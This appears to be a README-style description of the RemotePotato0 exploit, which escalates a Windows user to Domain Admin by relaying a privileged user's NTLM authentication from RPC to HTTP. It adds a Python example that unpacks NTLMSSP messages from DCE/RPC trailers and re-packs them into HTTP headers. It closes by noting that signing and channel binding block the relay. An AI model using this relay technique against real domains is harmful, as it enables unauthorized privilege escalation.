RemotePotato0
Just another “Won’t Fix” Windows Privilege Escalation from User to Domain Admin.
RemotePotato0 is an exploit that allows you to escalate your privileges from a generic User to Domain Admin.
Briefly:
It abuses the DCOM activation service to trigger an NTLM authentication from the user currently logged on to the target machine. You need a shell in session 0 (e.g. a WinRM or SSH shell) while a privileged user (e.g. a Domain Admin) is logged on in session 1. Once the NTLM type 1 (negotiate) message is triggered, a cross-protocol relay server receives the privileged user's NTLM messages over RPC and forwards them by unpacking the authentication from the RPC protocol and re-packing the same authentication over HTTP. On the receiving end you can set up a further relay node (e.g. ntlmrelayx) or relay directly to a privileged resource.
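As an added example (not code from the RemotePotato0 project), the Python below shows the re-encapsulation step from the summary above: the NTLMSSP messages that arrive inside a DCE/RPC security trailer are byte-for-byte the same messages HTTP carries base64-encoded in `Authorization` / `WWW-Authenticate` headers, so a relay can move them between the two protocols without touching them. The layouts used are the standard NTLMSSP NEGOTIATE/CHALLENGE/AUTHENTICATE messages and the 8-byte DCE/RPC `sec_trailer`; the domain, user, workstation, challenge and response bytes are constructed test values, and `relay_leg` is a hypothetical helper name.

```python
# Added example, not RemotePotato0 code. Shows how NTLMSSP messages are unpacked
# from a DCE/RPC security trailer and re-packed into HTTP NTLM headers (and back),
# which is the "cross-protocol" part of the relay. All sample bytes are constructed.
import base64
import struct

NTLMSSP_SIGNATURE = b"NTLMSSP\x00"
NEGOTIATE, CHALLENGE, AUTHENTICATE = 1, 2, 3
RPC_C_AUTHN_WINNT = 10                 # DCE/RPC auth_type value meaning NTLMSSP
RPC_C_AUTHN_LEVEL_CONNECT = 2
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001


def _sec_buffer(blob: bytes, offset: int) -> bytes:
    """Dereference an NTLM security buffer descriptor (Len, MaxLen, Offset)."""
    length, _maxlen, pos = struct.unpack_from("<HHI", blob, offset)
    return blob[pos:pos + length]


def parse_ntlm_message(blob: bytes) -> dict:
    """Parse the common header of any NTLMSSP message; for AUTHENTICATE also the identity."""
    if blob[:8] != NTLMSSP_SIGNATURE:
        raise ValueError("not an NTLMSSP message")
    msg_type = struct.unpack_from("<I", blob, 8)[0]
    info = {"type": msg_type}
    if msg_type == NEGOTIATE:                       # type 1: flags only, no identity
        info["flags"] = struct.unpack_from("<I", blob, 12)[0]
    elif msg_type == CHALLENGE:                     # type 2: flags + 8-byte server challenge
        info["flags"] = struct.unpack_from("<I", blob, 20)[0]
        info["server_challenge"] = blob[24:32]
    elif msg_type == AUTHENTICATE:                  # type 3: response + domain/user/workstation
        flags = struct.unpack_from("<I", blob, 60)[0]
        enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "ascii"
        info["flags"] = flags
        info["nt_response"] = _sec_buffer(blob, 20)
        info["domain"] = _sec_buffer(blob, 28).decode(enc)
        info["user"] = _sec_buffer(blob, 36).decode(enc)
        info["workstation"] = _sec_buffer(blob, 44).decode(enc)
    else:
        raise ValueError(f"unknown NTLMSSP message type {msg_type}")
    return info


def build_negotiate(flags: int) -> bytes:
    """Minimal NEGOTIATE message (constructed test input)."""
    return NTLMSSP_SIGNATURE + struct.pack("<II", NEGOTIATE, flags) + bytes(16)


def build_challenge(server_challenge: bytes, flags: int) -> bytes:
    """Minimal CHALLENGE message with empty TargetName/TargetInfo (constructed test input)."""
    empty = struct.pack("<HHI", 0, 0, 56)           # both buffers point at end of header
    return (NTLMSSP_SIGNATURE + struct.pack("<I", CHALLENGE) + empty
            + struct.pack("<I", flags) + server_challenge + bytes(8) + empty + bytes(8))


def build_authenticate(domain: str, user: str, workstation: str, nt_response: bytes) -> bytes:
    """Minimal AUTHENTICATE message (constructed; a real one also carries a valid MIC)."""
    fields = [b"", nt_response, domain.encode("utf-16-le"),
              user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""]
    header_len = 64 + 8 + 16                        # fixed part + Version + MIC
    payload, descriptors = b"", b""
    for f in fields:
        descriptors += struct.pack("<HHI", len(f), len(f), header_len + len(payload))
        payload += f
    return (NTLMSSP_SIGNATURE + struct.pack("<I", AUTHENTICATE) + descriptors
            + struct.pack("<I", NTLMSSP_NEGOTIATE_UNICODE) + bytes(8) + bytes(16) + payload)


def rpc_sec_trailer(ntlm_blob: bytes, context_id: int = 0) -> bytes:
    """Wrap an NTLMSSP message as the auth verifier at the tail of a DCE/RPC PDU:
    sec_trailer(auth_type, auth_level, auth_pad_length, reserved, auth_context_id) + auth_value."""
    return struct.pack("<BBBBI", RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_CONNECT,
                       0, 0, context_id) + ntlm_blob


def ntlm_from_rpc_sec_trailer(trailer: bytes) -> bytes:
    """Inverse of rpc_sec_trailer: validate the auth_type and return the raw NTLMSSP bytes."""
    auth_type = trailer[0]
    if auth_type != RPC_C_AUTHN_WINNT:
        raise ValueError(f"unexpected RPC auth_type {auth_type}")
    return trailer[8:]


def ntlm_to_http_header(ntlm_blob: bytes, server_side: bool = False) -> str:
    """Pack an NTLMSSP message the way HTTP carries it: base64 after the 'NTLM' scheme."""
    name = "WWW-Authenticate" if server_side else "Authorization"
    return f"{name}: NTLM {base64.b64encode(ntlm_blob).decode('ascii')}"


def ntlm_from_http_header(header: str) -> bytes:
    """Inverse: pull the NTLMSSP message out of an Authorization/WWW-Authenticate header."""
    _name, value = header.split(":", 1)
    scheme, token = value.strip().split(" ", 1)
    if scheme.upper() != "NTLM":
        raise ValueError("not an NTLM header")
    return base64.b64decode(token)


def relay_leg(rpc_trailer_from_victim: bytes) -> tuple:
    """Hypothetical helper: take one NTLM message received from the victim over RPC and
    return (HTTP header forwarding it unchanged, parsed view for logging what was relayed)."""
    blob = ntlm_from_rpc_sec_trailer(rpc_trailer_from_victim)
    return ntlm_to_http_header(blob), parse_ntlm_message(blob)


if __name__ == "__main__":
    # Constructed exchange: victim -> relay (RPC) -> HTTP target, challenge flows back.
    t1 = rpc_sec_trailer(build_negotiate(0x62088207))
    print(relay_leg(t1)[0])
    t2_http = ntlm_to_http_header(build_challenge(b"\x01" * 8, 0x00028201), server_side=True)
    print(rpc_sec_trailer(ntlm_from_http_header(t2_http)).hex())
    t3 = rpc_sec_trailer(build_authenticate("CORP", "da_admin", "WS01", b"\x11" * 24))
    print(relay_leg(t3)[1])
```

The type 1 (negotiate) message carries no identity at all; the domain and user name only appear in the type 3 (authenticate) message, so that is the leg on which a relay node such as ntlmrelayx learns whose authentication it is about to use. Because the messages are forwarded unmodified, what stops this kind of relay at the target is the target's own policy: a service that requires NTLM signing or channel binding (EPA) rejects the relayed authentication.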